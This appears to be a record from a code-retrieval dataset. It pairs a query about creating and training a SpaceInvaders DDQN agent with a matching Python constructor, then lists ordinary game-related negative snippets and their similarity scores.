data.graph_surface(decfun, bbox, offset=0.5)\n # data.graph_data(X, Y_, Y)\n\n # derivacije gubitka po klasifikacijskom rezultatu\n dL_dscores = np.subtract(probs, Y_) # N x 1\n\n # gradijenti parametara\n grad_w = np.divide(np.dot(X.T, dL_dscores), N) # D x 1\n grad_b = np.divide(np.sum(dL_dscores), N) # 1 x 1\n\n # poboljšani parametri\n w += -PARAM_DELTA * grad_w\n b += -PARAM_DELTA * grad_b\n\n return w, b", "def calculate_log_perplexity(self, output, flat_labels): #completed, expensive, should be compiled\n return -np.sum(np.log2(np.clip(output, a_min=1E-12, a_max=1.0))[np.arange(flat_labels.shape[0]), flat_labels[:,1]])", "def _object_func_marginals_coarse_log(log_params, *args, **kwargs):\n return _object_func_marginals_coarse(numpy.exp(log_params), *args, **kwargs)", "def ComputeLogGradientTerm(self, *args):\n return _ITKCostFunctionsPython.itkShapePriorMAPCostFunctionBaseIF2F_ComputeLogGradientTerm(self, *args)", "def nloglikeobs(self, params):\n lambda_ = params[0]\n\n ll_output = self._LL(self.endog, rate=lambda_)\n\n return -np.log(ll_output)" ]
[ "0.6378001", "0.6166156", "0.6106605", "0.5986836", "0.59717876", "0.59704345", "0.59436226", "0.59277886", "0.59004104", "0.5880232", "0.58595026", "0.5850303", "0.5847764", "0.5805098", "0.5797871", "0.5773712", "0.57430214", "0.5730535", "0.5728411", "0.5695498", "0.5692875", "0.56894165", "0.56871295", "0.5641088", "0.5625169", "0.56205744", "0.5615457", "0.5612503", "0.5609048", "0.55979997", "0.55879", "0.5563873", "0.55304533", "0.5519584", "0.55065334", "0.55019194", "0.54908335", "0.54866207", "0.5459678", "0.54480726", "0.54426587", "0.5432098", "0.54161847", "0.5404022", "0.5396066", "0.53948337", "0.53847915", "0.53799236", "0.53707767", "0.53654844", "0.53590035", "0.5353767", "0.5335818", "0.5331275", "0.53304774", "0.53268474", "0.532503", "0.5316599", "0.5315532", "0.5313041", "0.53116375", "0.53033835", "0.52984333", "0.52945787", "0.528327", "0.5282651", "0.52821815", "0.5281049", "0.5272419", "0.52698946", "0.52677405", "0.5267534", "0.52663547", "0.5265353", "0.52507097", "0.52447474", "0.5242855", "0.52366304", "0.52347183", "0.5222501", "0.5215998", "0.52086055", "0.5208299", "0.5206244", "0.5205503", "0.5203742", "0.51976013", "0.5195578", "0.5192546", "0.51924056", "0.5188186", "0.5187208", "0.5187134", "0.51859534", "0.51841575", "0.5173836", "0.51732194", "0.51731825", "0.5170564", "0.51699156", "0.5167506" ]
0.0
-1
Create the game, SpaceInvaders. Train or test it.
def __init__ (self,gameName,total_episodes=50,train_or_test=2): #additional param:- doLoadNetwork=True self.createGame(gameName) ### Training Hyperparameters self.TOT_EPISODES = total_episodes #no. of episodes/epochs self.MAX_STEPS = 50000 #max steps taken every episode/epoch ### Preprocessing Hyperparameters self.stack_size = 4 #stacking 3 frames at once. self.stacked_frames = deque([np.zeros((84,84), dtype=np.int) for i in range(self.stack_size)], maxlen=4) ### Model self.dqn = DDQN(self.action_space) self.path = "saved.h5" # train agent or simulate the game. if train_or_test == 1: self.trainAgent() elif train_or_test == 2: #load network before simulating. self.load_network() self.simulate()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self, game_name, skip_actions=4, num_frames=4, w=84, h=84):\n self.env = gym.make(game_name)\n self.num_frames = num_frames\n self.skip_actions = skip_actions\n self.w = w\n self.h = h\n\n if game_name == 'SpaceInvaders-v0':\n self.action_space=[1,2,3]\n\n self.action_size = len(self.action_space)\n self.state = None\n self.game_name = game_name", "def create_game(self):\n\n\t\tself.player_model.grid = []\n\t\tself.player_model.available_cells = []\n\n\t\tfor i in range(9):\n\t\t\tc = Cell(i, None)\n\t\t\tself.player_model.grid.append(c)\n\t\t\tself.player_model.available_cells.append(c)\n\n\t\tself.player_frame.setup_game(self.player_model.current_player.name)", "def _create_games(self):\n\n ''''''", "def start_game(self):\n\n\t\tpass", "def setup_game(self):", "def make_game(self):\n game = Game(self.data['gamename'])\n self.game = game\n return game", "def game_start():\n herolist = Hero_List(hots_db)\n heroclasses = []\n for item in herolist:\n heroclasses.append(Item(item, 'hero'))\n curgame = Game(Team('home'), Team('enemy'), Team('hero_pool', heroclasses), '')\n return curgame", "def create(game):\r\n ## Create Garbage\r\n game.garbage = deque([])\r\n\r\n ## Create Stars\r\n game.create_stars()\r\n\r\n ## Create Millenium Falcon\r\n game.falcons = MilleniumFalcon.init(game)\r\n game.millenium_falcon = MilleniumFalcon()\r\n \r\n ## Create TIE Fighters\r\n game.fighters = Fighter.init(game)\r\n\r\n ## Create Asteroids\r\n game.rocks = Group.mesh(Rock1.init(game), Rock2.init(game))\r\n\r\n ## Create Lasers\r\n game.pro_lasers = ProLaser.init(game)\r\n game.con_lasers = ConLaser.init(game)\r\n\r\n ## Setup collision groups\r\n Group.bind(game.pro_lasers, game.rocks, game.act_laser_void)", "def start(self):\n self.player = Player()\n self.dealer = Dealer()\n self.pot = 0\n self.side_bet = 0\n start_game()", "def init_new_game(self):\n self.game = get_new_game(self.game_config)", "def start_game(self):\n self.board = Board(num_tableaus=self.tableau_qty, num_decks=self.decks, deal_3=self.deal_3)\n self.board.init_move_dict()\n self.board.deal(self.deck)\n\n if self.api_use:\n self.init_game_api()\n elif self.commandline:\n self.init_cl_game()\n else:\n self.init_pygame()", "def setUp(self):\r\n self.spaceship = SpaceShipGame()", "def setUp(self):\r\n self.spaceship = SpaceShipGame()", "def setUp(self):\r\n self.spaceship = SpaceShipGame()", "def setUp(self):\r\n self.spaceship = SpaceShipGame()", "def setUp(self):\r\n self.spaceship = SpaceShipGame()", "def main():\n g = Game(800, 600)\n g.start()", "def spawn_players(self) -> None:\n #Create the player\n self.player1 = Player(self.sensitivity, self.screen_width, self.screen_height, self.screen_width//(3/2), self.screen_height-50, self.player_lives, self.fps, self.player1_bullet, Direction.UP, self.debug)\n\n #Create the AI\n self.player2 = AIPlayer(self.sensitivity, self.screen_width, self.screen_height, self.screen_width//3, self.screen_height-50, self.player_lives, self.fps, self.player2_bullet, Direction.UP, 1, True, self.debug)", "def create_one_game(self):\n return Game2048(task_name=self.result_path, game_mode=False)", "def setup_new_game(self):\r\n self._player = Player()\r\n self._stats = GameStats(self._bb_settings)\r\n self._scoreboard = Scoreboard(self._bb_settings, self._screen)", "def create_new_game(self):\r\n global game_instance\r\n game_instance = game.Game()\r\n game_instance.set_word(db.get_random_word())\r\n print(\"\\n---------NEW GAME---------\")\r\n self.current_word = \"----\"", "def simulate(self):\r\n\t\tprint(\"##################################\")\r\n\t\tprint(\"SIMULATING GAME - SpaceInvaders..\")\r\n\t\tprint(\"##################################\")\r\n\t\t\r\n\t\t# Play 3 episodes:\r\n\t\tfor i in range(3):\r\n\t\t\tprint(\"Playing Episode %d\" % i)\r\n\t\t\tstate = self.env.reset()\r\n\t\t\t#self.env.render()\r\n\t\t\tdone = False\r\n\t\t\ttot_reward = 0\r\n\t\t\tstate,_ = stack_frames(self.stack_size,self.stacked_frames, \r\n\t\t\t\t\t\t\t\t\t\tstate, True)\r\n\t\t\t# play until dead.\t\t\t\r\n\t\t\twhile not done:\r\n\t\t\t\t# get the value predicted by the model and perform that action.\r\n\t\t\t\t# keras conv2d expects a 4D input. So add an empty axis. \r\n\t\t\t\tstate = np.expand_dims(state, axis=0)\r\n\t\t\t\t# predict action directly from the saved neural network.\r\n\t\t\t\taction = np.argmax(self.dqn.getModel().predict(state)[0])\r\n\t\t\t\t# perform that action.\r\n\t\t\t\tstate, reward, done, _ = self.env.step(action)\r\n\t\t\t\tself.env.render()\r\n\t\t\t\tstate,_ = stack_frames(self.stack_size,self.stacked_frames, \r\n\t\t\t\t\t\t\t\t\t\tstate, False)\r\n\t\t\t\ttot_reward+=reward\r\n\t\t\tprint(\"Reward: \", tot_reward)\r\n\t\tself.env.close() # to avoid sys.meta_path error\r", "def __init__(self):\n\n # Change directory into the directory above this file - the\n # one containng the 'res' tree. Note that if we've been built via\n # py2exe, we will actually be in a zip file so account for that.\n path = os.path.dirname(os.path.dirname(__file__))\n if (os.path.basename(path) == \"library.zip\"):\n path = os.path.dirname(path)\n os.chdir( path )\n sys.path += [\".\"]\n\n # Services exposed to the entities.\n self.game_services = SpaceGameServices(self)\n\n # The resource loader.\n self.resource_loader = resource.ResourceLoader()\n\n # The configuration.\n if os.path.isfile(\"./config.txt\"):\n self.config = self.resource_loader.load_config_file_from(\"./config.txt\")\n else:\n self.config = self.resource_loader.load_config_file(\"base_config.txt\")\n\n # Create the renderer.\n renderer_name = self.config.get_or_default(\"renderer\", \"src.pygame_renderer.PygameRenderer\")\n renderer_class = utils.lookup_type(renderer_name)\n screen_size = (self.config.get_or_default(\"screen_width\", 1024),\n self.config.get_or_default(\"screen_height\", 768))\n self.renderer = renderer_class(screen_size, self.config, data_path=\"./res\")\n\n # The resource loaded needs a renderer to load images etc.\n self.resource_loader.set_renderer(self.renderer)\n\n # The input handling system.\n self.input_handling = None\n\n # The enemy.\n self.wave_spawner = None\n\n # Create the entity manager.\n self.entity_manager = ecs.EntityManager(self.game_services)\n\n # Configure the resource loader.\n self.resource_loader.set_minimise_image_loading(\n self.config.get_or_default(\"minimise_image_loading\", False)\n )\n\n # The drawing visitor.\n self.drawing = drawing.Drawing(self.game_services)\n\n # Is the game running?\n self.running = False\n\n # Should we load the game?\n self.want_load = False\n\n # Should we pause the game?\n self.want_pause = False\n\n # Should we unpause the game?\n self.want_resume = False\n\n # Should we simulate one frame and then pause?\n self.want_step = False", "def _new(self, *args):\n if self.game:\n raise ServerException('already playing a game')\n self.game, self.player = self.server.new_game(self)", "def setUp(self):\r\n self.spaceship = SpaceShipGame()\r\n self.spaceship.init()", "def test_init_with_existing_game(self):\n pass\n # Ensure judge is the same", "def load_game(self):\n game = Game(self.w, self.h, self.screen)\n game.run()", "def new_game(cls, user):\n game = Game(user=user,\n game_state=\".........\",\n game_over=False)\n game.put()\n return game", "def make_game():\n return ascii_art.ascii_art_to_game(\n GAME_ART, what_lies_beneath='.',\n sprites={'P': PlayerSprite})", "def __init__(self, players, gamespace, start_state, transitions, setup, finish, get, post):\n\n self.players = players\n self.gamespace = gamespace\n self.start_state = start_state\n self.transitions = transitions\n self.setup = setup\n self.finish = finish\n self.get = get\n self.post = post\n\n self.turn = 1", "def start_new_game(self):\r\n\r\n self.initialize_game_params()\r\n self.timer = Timer(self.screen)\r\n self.mine_counter = MineCounter(self.num_of_mines, self.screen)\r\n self.reset_button = ResetButton(self.screen)\r\n self.high_score = HighScore(self.rows, self.cols, self.num_of_mines, self.screen)\r\n self.board = Board(self.rows, self.cols, self.num_of_mines, self.screen)\r\n self.play_game()", "def new_game(self, req):\n return models.BattleShip.create(req.left, req.right)", "def run(self):\n pygame.init()\n pygame.display.set_caption(\"Genetic Game\")\n self.screen = pygame.display.set_mode((self.SCREEN_W, self.SCREEN_H), 0, 32)\n\n self.ominus_sprites = [OminusSprite(self.screen, o, PLAYERS_COLORS[o.id]) for o in self.model.get_players()]\n for o in self.ominus_sprites:\n self.agent_group.add(o)\n\n self.wall_sprites = [WallSprite(self.screen, w) for w in self.model.get_walls()]\n for w in self.wall_sprites:\n self.terrain_group.add(w)", "def new_game(self):\n self.ui = UI()\n self.board.retract_board()\n self.board = Board()\n self.turn = BLUE\n self.selected_legal_moves = []\n self.selected_piece = None", "def __init__(self, agent, make_env=lambda:gym.make(\"SpaceInvaders-v0\"), n_games=1, max_size=None,\n preprocess_observation = lambda obs:obs,agent_step=None):\n if not isinstance(make_env, function):\n env_name = make_env\n make_env = lambda: gym.make(env_name)\n\n #create atari games\n self.make_env = make_env\n self.envs = [self.make_env() for _ in range(n_games)]\n self.preprocess_observation = preprocess_observation\n\n\n #initial observations\n self.prev_observations = [self.preprocess_observation(make_env.reset()) for make_env in self.envs]\n\n #agent memory variables (if you use recurrent networks\n self.prev_memory_states = [np.zeros((n_games,)+tuple(mem.output_shape[1:]),\n dtype=get_layer_dtype(mem))\n for mem in agent.agent_states]\n\n #save agent\n self.agent = agent\n self.agent_step = agent_step or agent.get_react_function()\n\n # Create experience replay environment\n self.experience_replay = SessionPoolEnvironment(observations=agent.observation_layers,\n actions=agent.action_layers,\n agent_memories=agent.agent_states)\n self.max_size = max_size\n\n #whether particular session has just been terminated and needs restarting\n self.just_ended = [False] * len(self.envs)", "def main():\n field = Field(10, 10)\n snake = Snake((0, 0))\n game = Game(field, snake)\n game.start()", "def do_create_game(self):\n\t\tself.nickname = self.e_nickname.text\n\n\t\tself.hide_all()\n\t\tself.show_create()\n\t\tself.renderer.color = (255, 255, 255, 0)", "def start(self):\n self.save_checkpoint(\"setup\")\n\n logging.info(\"Starting game...\")\n body = render_message(\n \"welcome.html\",\n game_name=self.name,\n night_end=self.night_end.strftime(\"%I:%M %p\"),\n day_end=self.day_end.strftime(\"%I:%M %p\"),\n players=self.game.players,\n )\n self.send_message(mafia.events.PUBLIC, \"%s: Start\" % self.name, body)\n self.game.begin()\n self.started = True\n\n self.save_checkpoint(\"start\")", "async def createGameSpace(self, ctx):\n self.category = await ctx.guild.create_category_channel(name=self.categoryName)\n print(\"Category created\")\n await self.category.set_permissions(self.roleForPlayer, read_messages=True, connect=True)\n roleEveryone = discord.utils.get(ctx.guild.roles, name=\"@everyone\")\n await self.category.set_permissions(roleEveryone, read_messages=False, connect=False)\n\n self.textChannel = await ctx.guild.create_text_channel(name=\"Partie\", category=self.category)\n print(\"Text channel created\")\n self.voiceChannel = await ctx.guild.create_voice_channel(name=\"Village\", category=self.category)\n print(\"Voice channel created\")\n await self.voiceChannel.edit(user_limit=len(self.players) + 2, sync_permissions=True)\n await self.textChannel.edit(nsfw=True, sync_permissions=True)", "async def new(ctx):\n if ctx.message.channel.name.lower() not in tod_channels:\n return\n\n room = ctx.message.channel.name.lower()\n host = ctx.message.author\n if room not in tod_games:\n tod_games[room] = {'host': host.name, 'host_id': host.name, 'participants': {}, 'last': None}\n tod_games[room]['current'] = host.name\n tod_games[room]['last'] = host.name\n tod_games[room]['participants'][host.name.lower()] = {'spins': 0}\n await amor_manager.say(\"New Game of Truth Or Dare started in {}\".format(room))\n else:\n host = tod_games[room]['host']\n await amor_manager.say(\"Truth or Dare already in progress in {}. Game host: {}\".format(room, host))", "def create_game(agent, other_agent, games_counter, verbose_mode,\n from_db=False, cards_in_hand=13):\n if from_db:\n pass\n # todo(maryna): create single game from db. pay attention to players\n # initialization + the iterator.\n trick_counter = [0, 0, ] # [Team 0, Team 1]\n previous_tricks = []\n game = Game(agent, other_agent, games_counter, trick_counter, verbose_mode,\n previous_tricks, Trick({}), cards_in_hand=cards_in_hand)\n return game", "def new_game(self):\n self.bet_history = []\n self.in_game = [True] * len(self.agents)\n self.in_game_count = len(self.agents)\n self.bet_hist = []\n self.pot = big_blind + small_blind\n self.chips[self.starting_player] -= small_blind\n self.chips[(self.starting_player + 1) % len(self.agents)] -= big_blind\n self.all_in = [False] * len(self.agents)\n\n self.hands = None\n self.community_cards = []\n\n self.shuffle_deck()\n\n for i in range(0, len(agents)):\n self.agents[i].new_game(len(agents), i)", "def test_valid_game_setup(self):\n self.assertEqual(self._game.active_players(), 1)\n for x in xrange(1, 4):\n self._game.add_player(self._users[x], x)\n self.assertEqual(self._game.active_players(), 4)\n self.assertIsREADY(self._game)", "def start(self):\n self.__init__()\n self.set_n_players()\n self.init_players()\n self.init_territory_selection_phase()\n self.init_troop_deployment_phase()\n # self.game_phase()", "def setup_game(self, player, opponent):\n\n self.display.clear_screen()\n\n ship_index = 0\n\n while not player.ready(len(self.SHIP_INFO)):\n # prints the currrent board\n board = self.display.construct_player_board(player, opponent, True)\n self.display.print_board(board)\n\n ship_name, ship_length = self.SHIP_INFO[ship_index]\n ship_to_add = Ship(ship_name, ship_length)\n\n try:\n player.add_ship(ship_to_add)\n except Exception as e:\n ship_to_add = player.ships[ship_index]\n\n origin, orientation = self.display.prompt_for_ship_placement(\n ship_to_add)\n\n try:\n player.place_ship(ship_to_add, origin, orientation,\n self.BOARD_SIZE)\n except ValueError as ve:\n self.display.clear_screen()\n print(ve)\n print()\n continue\n\n self.display.clear_screen()\n ship_index += 1\n self.display.prompt_switch(opponent.name)", "def populate_games():\n global games\n games[0] = SnakeGame(lp)", "def __init__(self, game):\n self.rooms = self.load_rooms(f\"data/{game}Rooms.txt\")\n self.items = self.load_items(f\"data/{game}Items.txt\")\n self.inventory = self.load_inventory()\n self.current_room = self.rooms[0]\n self.idlist = []\n self.player = Inventory()", "def start_game(self):\n self._add_mines()", "def test_runGame(self):\n # this is tested by playing the game. No good way to unit test this.\n pass", "def basic_begin_game(game_context) :\n game_context.world.set_game_defined()\n execute_context(game_context)", "def new(self):\n self.playing = True\n self.score = 0\n # GROUPS AND LAYERS\n self.all_sprites = pg.sprite.LayeredUpdates() # Lets you assign layer to group to render in correct order\n self.planets = pg.sprite.Group()\n self.moons = pg.sprite.Group()\n self.mobs = pg.sprite.Group()\n self.stars = pg.sprite.Group()\n self.pickups = pg.sprite.Group()\n self.arrows = pg.sprite.Group()\n # SCREEN\n self.frame_coordinates = vec(0, 0)\n self.first_planet = Planet(self) # Add 1st Planet\n self.player = Player(self, self.first_planet) # Add Player on First Planet\n self.added_planets = 0\n self.spawn_planets(PLANETS + self.added_planets)\n self.arrow = Arrow(self)\n self.sun = Sun(self)\n\n # Messages\n self.corner_msg = 'Traverse & Score!'\n self.corner_msg_flag = False\n self.corner_msg_start_time = pg.time.get_ticks()\n\n self.arrow_msg = False\n\n # Play Music\n pg.mixer.music.load(path.join(self.snd_dir, LEVEL_1_MUSIC))\n\n # Start Game Loop\n self.run()\n print(\"GOT TO END OF NEW()\")", "def game_created(self, pname, game):\n logging.debug('Game Created:')\n logging.debug(game)\n g = self.games.get(game['matchid'], None)\n if g:\n g.roomid = game['roomid']\n g.tableindex = game['tableindex']\n self.comm.game_ready(g)", "def new_game(self):\n self.cells = [] # Array of cells\n self.frame_count = 0\n self.database = []\n self.timer = [Consts[\"MAX_TIME\"], Consts[\"MAX_TIME\"]]\n self.result = None\n # Define the players first\n self.cells.append(Cell(0, [Consts[\"WORLD_X\"] / 4, Consts[\"WORLD_Y\"] / 2], [0, 0], Consts[\"DEFAULT_RADIUS\"]))\n self.cells.append(Cell(1, [Consts[\"WORLD_X\"] / 4 * 3, Consts[\"WORLD_Y\"] / 2], [0, 0], Consts[\"DEFAULT_RADIUS\"]))\n # Generate a bunch of random cells\n for i in range(Consts[\"CELLS_COUNT\"]):\n if i < 4:\n rad = 1.5 + (random.random() * 1.5) # Small cells\n elif i < 10:\n rad = 10 + (random.random() * 4) # Big cells\n else:\n rad = 2 + (random.random() * 9) # Everything else\n x = Consts[\"WORLD_X\"] * random.random()\n y = Consts[\"WORLD_Y\"] * random.random()\n cell = Cell(i + 2, [x, y], [(random.random() - 0.5) * 2, (random.random() - 0.5) * 2], rad)\n safe_dist = Consts[\"SAFE_DIST\"] + rad\n while min(map(cell.distance_from, self.cells[:2])) < safe_dist:\n cell.pos = [\n Consts[\"WORLD_X\"] * random.random(),\n Consts[\"WORLD_Y\"] * random.random()\n ]\n self.cells.append(cell)", "async def new_game():\n if enough_players():\n GAME.new_game()\n await update_players()", "async def creatingGame(self, ctx):\n if self.progression == \"\":\n self.progression = \"Création d'une partie\"\n msg1 = await ctx.channel.send(\n content=\"Seules les réactions ayant plus de 2 voix seront comptabilisées.\"\n \"```css\\nLes rôles en verts sont les membres du village.```\"\n \"```Markdown\\n#Les rôles en bleu dépendent de la partie.```\"\n \"```diff\\n-Les rôles en rouge sont les loups-garous.```\"\n \"```Fix\\n#Les rôles en orange doivent gagner seul.```\",\n embed=self.embedPage1)\n self.msgChoiceRole.append(msg1.id)\n self.msgToDelete.append(msg1)\n await self.addRolesOnEmbed(msg1)\n else:\n await self.wait(ctx)", "def test_game():\n \n # check that all of the functions are callable\n assert callable(g.AdventureGame)\n \n # Load up the rooms for the test game\n testGame = g.AdventureGame(tg.testRooms, tg.starting_room)\n \n # Test that the constructor properly loads the rooms\n assert testGame.rooms == tg.testRooms\n assert testGame.starting_room == tg.starting_room\n assert testGame.current_room == tg.starting_room", "def test_game_creation(self):\n self.assertTrue(len(models.Game.objects.all()) == 1)\n game = models.Game.objects.all()[0]\n\n # Hydrocarbon piles initialization test\n number_of_piles = len(settings.HYDROCARBON_STOCKS_PER_PLAYER)\n for i_pile in range(number_of_piles):\n self.assertEqual(0, game.hydrocarbon_piles.get(index=i_pile).stock_amount)\n\n # Events initialization test [TO DO]\n\n # Source buildings loading test\n version_source_buildings = models.SourceBuilding.objects.filter(version=game.version)\n self.assertEqual(version_source_buildings.count(), game.source_buildings.count())\n for version_source_building in version_source_buildings:\n self.assertEqual(version_source_building, game.source_buildings.get(slug=version_source_building.slug))\n\n # Source events loading test [TO DO]\n\n # Source technologies loading test\n version_source_technologies = models.SourceTechnology.objects.filter(version=game.version)\n self.assertEqual(version_source_technologies.count(), game.source_technologies.count())\n for version_source_technology in version_source_technologies:\n self.assertEqual(version_source_technology,\n game.source_technologies.get(slug=version_source_technology.slug))", "def create_game(self, user, attempts_remaining, attempts_used,\n score, current_level):\n\n game = Game(user=user, attempts_remaining=attempts_remaining,\n score=score, attempts_used=attempts_used,\n current_level=current_level)\n game.put()\n return game", "def create_scene():\n create_floor()\n if config.M != \"\":\n if config.LEVEL == 1:\n create_wall()\n create_enemy()\n create_gap()\n create_platform()\n create_marijuana()\n create_star()\n create_fish()\n elif config.LEVEL == 2:\n create_boss()\n create_platform()\n create_star()", "def new_game(cls, user, raw_ships):\n ships = ShipsManager(Ship, raw_ships).create_ships()\n game = Game(player=user, players_ships=ships,\n opponents_ships=ShipsGenerator(\n Ship).generate_opponents_ships())\n game.put()\n return game", "def init_game(self):\n self.view.carregar_jogadores_possiveis(self._possible_players_list())\n self.view.put_view_in_main_loop()", "def __init__(self, players):\n\n # Instantiate a Players object with the players queue\n self._players = Players(players)\n # Instantiate the Die to be used for the current game\n self._die = Die()\n # Track the game status\n self._active_turn = True\n self._end_game = False", "def received_CREATE(self, message):\n\n\t\t_, rival_name, order = message.split(' ')\n\n\t\tplayer_token = \"X\" if order == \"first\" else \"O\"\n\t\trival_token = \"O\" if order == \"first\" else \"X\"\n\n\t\tself.player_model.player.token = player_token\n\n\t\t#Initializing rival player\n\t\tself.player_model.rival_player.name = rival_name\n\t\tself.player_model.rival_player.token = rival_token\n\t\tself.player_model.current_player = self.player_model.player if order == \"first\" else self.player_model.rival_player\n\n\t\tself.create_game()\n\n\t\tif order == \"first\":\n\t\t\tself.play()\n\n\t\telse:\n\t\t\tself.wait_to_play()\n\n\t\tself.player_frame.message_screen.write(f\"New game against {rival_name}\")\n\t\tself.player_frame.message_screen.write(f\"You go {order}\")", "def start(self, timed):\n\n if timed:\n self._game = TimedGame(self._players)\n else:\n self._game = Game(self._players)\n \n self._game.start()", "def generate(self):\n DistributedObject.DistributedObject.generate(self)\n\n # Get the state machine stuff for playGame\n self.loader = self.cr.playGame.hood.loader\n self.trolleyStation = self.loader.geom.find('**/*trolley_station*')\n self.trolleyCar = self.trolleyStation.find('**/trolley_car')\n self.trolleySphereNode = self.trolleyStation.find('**/trolley_sphere').node()\n\n # We'll need a pair of fog objects to enshadow the trolley\n # while it's rolling through the entrance or exit tunnels.\n\n exitFog = Fog(\"TrolleyExitFog\")\n exitFog.setColor(0.0, 0.0, 0.0)\n exitFog.setLinearOnsetPoint(30.0, 14.0, 0.0)\n exitFog.setLinearOpaquePoint(37.0, 14.0, 0.0)\n exitFog.setLinearFallback(70.0, 999.0, 1000.0)\n self.trolleyExitFog = self.trolleyStation.attachNewNode(exitFog)\n self.trolleyExitFogNode = exitFog\n \n enterFog = Fog(\"TrolleyEnterFog\")\n enterFog.setColor(0.0, 0.0, 0.0)\n enterFog.setLinearOnsetPoint(0.0, 14.0, 0.0)\n enterFog.setLinearOpaquePoint(-7.0, 14.0, 0.0)\n enterFog.setLinearFallback(70.0, 999.0, 1000.0)\n self.trolleyEnterFog = self.trolleyStation.attachNewNode(enterFog)\n self.trolleyEnterFogNode = enterFog\n\n # We'll have fog explicitly disabled for the trolley car, by\n # default. This makes it look maybe a little weird in\n # Donald's Dock--why does the trolley punch through the fog so\n # well? But it keeps the trolley from flashing in and out as\n # we turn on and off the shadow fog.\n self.trolleyCar.setFogOff()\n\n # Variables used to animate trolley parts\n # Key\n self.keys = self.trolleyCar.findAllMatches('**/key')\n self.numKeys = self.keys.getNumPaths()\n self.keyInit = []\n self.keyRef = []\n for i in range(self.numKeys):\n key = self.keys[i]\n key.setTwoSided(1)\n ref = self.trolleyCar.attachNewNode('key' + `i` + 'ref')\n ref.iPosHpr(key)\n self.keyRef.append(ref)\n self.keyInit.append(key.getTransform())\n # Front wheels\n self.frontWheels = self.trolleyCar.findAllMatches('**/front_wheels')\n self.numFrontWheels = self.frontWheels.getNumPaths()\n self.frontWheelInit = []\n self.frontWheelRef = []\n for i in range(self.numFrontWheels):\n wheel = self.frontWheels[i]\n ref = self.trolleyCar.attachNewNode('frontWheel' + `i` + 'ref')\n ref.iPosHpr(wheel)\n self.frontWheelRef.append(ref)\n self.frontWheelInit.append(wheel.getTransform())\n # Back wheels\n self.backWheels = self.trolleyCar.findAllMatches('**/back_wheels')\n self.numBackWheels = self.backWheels.getNumPaths()\n self.backWheelInit = []\n self.backWheelRef = []\n for i in range(self.numBackWheels):\n wheel = self.backWheels[i]\n ref = self.trolleyCar.attachNewNode('backWheel' + `i` + 'ref')\n ref.iPosHpr(wheel)\n self.backWheelRef.append(ref)\n self.backWheelInit.append(wheel.getTransform())\n\n # Create the trolley enter track\n trolleyAnimationReset = Func(self.resetAnimation)\n trolleyEnterStartPos = Point3(-20, 14, -1)\n trolleyEnterEndPos = Point3(15, 14, -1)\n\n trolleyEnterPos = Sequence(name=\"TrolleyEnterPos\")\n if base.wantFog:\n trolleyEnterPos.append(Func(self.trolleyCar.setFog, self.trolleyEnterFogNode))\n trolleyEnterPos.append(self.trolleyCar.posInterval(\n TROLLEY_ENTER_TIME,\n trolleyEnterEndPos,\n startPos=trolleyEnterStartPos,\n blendType=\"easeOut\"))\n if base.wantFog:\n trolleyEnterPos.append(Func(self.trolleyCar.setFogOff))\n \n trolleyEnterTrack = Sequence(trolleyAnimationReset, \n trolleyEnterPos,\n name = 'trolleyEnter')\n # \n # How many revolutions of the wheel?\n keyAngle = round(TROLLEY_ENTER_TIME) * 360\n dist = Vec3(trolleyEnterEndPos - trolleyEnterStartPos).length()\n wheelAngle = dist/(2.0 * math.pi * 0.95) * 360\n trolleyEnterAnimateInterval = LerpFunctionInterval(\n self.animateTrolley,\n duration = TROLLEY_ENTER_TIME,\n blendType = \"easeOut\",\n extraArgs = [keyAngle, wheelAngle],\n name = \"TrolleyAnimate\")\n trolleyEnterSoundTrack = SoundInterval(self.trolleyAwaySfx, node=self.trolleyCar)\n self.trolleyEnterTrack = Parallel(trolleyEnterTrack,\n trolleyEnterAnimateInterval,\n trolleyEnterSoundTrack,\n )\n\n # Create the trolley exit track\n trolleyExitStartPos = Point3(15, 14, -1)\n trolleyExitEndPos = Point3(50, 14, -1)\n\n trolleyExitPos = Sequence(name=\"TrolleyExitPos\")\n if base.wantFog:\n trolleyExitPos.append(Func(self.trolleyCar.setFog, self.trolleyExitFogNode))\n trolleyExitPos.append(self.trolleyCar.posInterval(\n TROLLEY_EXIT_TIME,\n trolleyExitEndPos,\n startPos=trolleyExitStartPos,\n blendType=\"easeIn\"))\n if base.wantFog:\n trolleyExitPos.append(Func(self.trolleyCar.setFogOff))\n \n \n trolleyExitBellInterval = SoundInterval(self.trolleyBellSfx, node=self.trolleyCar)\n trolleyExitAwayInterval = SoundInterval(self.trolleyAwaySfx, node=self.trolleyCar)\n\n keyAngle = round(TROLLEY_EXIT_TIME) * 360\n dist = Vec3(trolleyExitEndPos - trolleyExitStartPos).length()\n wheelAngle = dist/(2.0 * math.pi * 0.95) * 360\n trolleyExitAnimateInterval = LerpFunctionInterval(\n self.animateTrolley,\n duration = TROLLEY_EXIT_TIME,\n blendType = \"easeIn\",\n extraArgs = [keyAngle, wheelAngle],\n name = \"TrolleyAnimate\")\n\n self.trolleyExitTrack = Parallel(trolleyExitPos,\n trolleyExitBellInterval,\n trolleyExitAwayInterval,\n trolleyExitAnimateInterval,\n name = self.uniqueName(\"trolleyExit\")\n )", "async def startingGame(self, ctx):\n # =-=-=-= ATTRIBUTE ROLES FOR PLAYERS =-=-=-= #\n self.msgToDelete.append(await ctx.message.channel.send(\"Attribution des rôles ...\"))\n self.rolesOrder = self.roles.copy()\n self.rolesOrder = list(dict.fromkeys(self.rolesOrder)) # Remove redundant roles for playGame()\n random.seed(time.time())\n random.shuffle(self.players)\n random.shuffle(self.roles)\n self.roles = self.roles[:len(self.players) + 3]\n if self.roles.count(\"Franc-Maçon\") % 2 != 0: # Only One Freemason in\n for i in range(len(self.roles)):\n if self.roles[i] == \"Franc-Maçon\":\n self.roles[(i + 1) % len(self.roles)] = \"Franc-Maçon\"\n random.seed(time.time())\n random.shuffle(self.players)\n random.shuffle(self.roles)\n break\n\n for numberPlayer in range(len(self.players)):\n # At least there is less player than role, so I need to get the number of players instead of roles.\n\n self.syncRole(user=self.players[numberPlayer], roleToAdd=self.roles[numberPlayer],\n listToAdd=self.playersAndRoles)\n\n # =-=-=-= ATTRIBUTE ROLES FOR DECK =-=-=-= #\n for numberCentralRole in range(len(self.players), len(self.players) + 3):\n if numberCentralRole == len(self.players) + 0:\n position = \"gauche\"\n elif numberCentralRole == len(self.players) + 1:\n position = \"milieu\"\n else:\n position = \"droite\"\n self.syncRole(user=position, roleToAdd=self.roles[numberCentralRole], 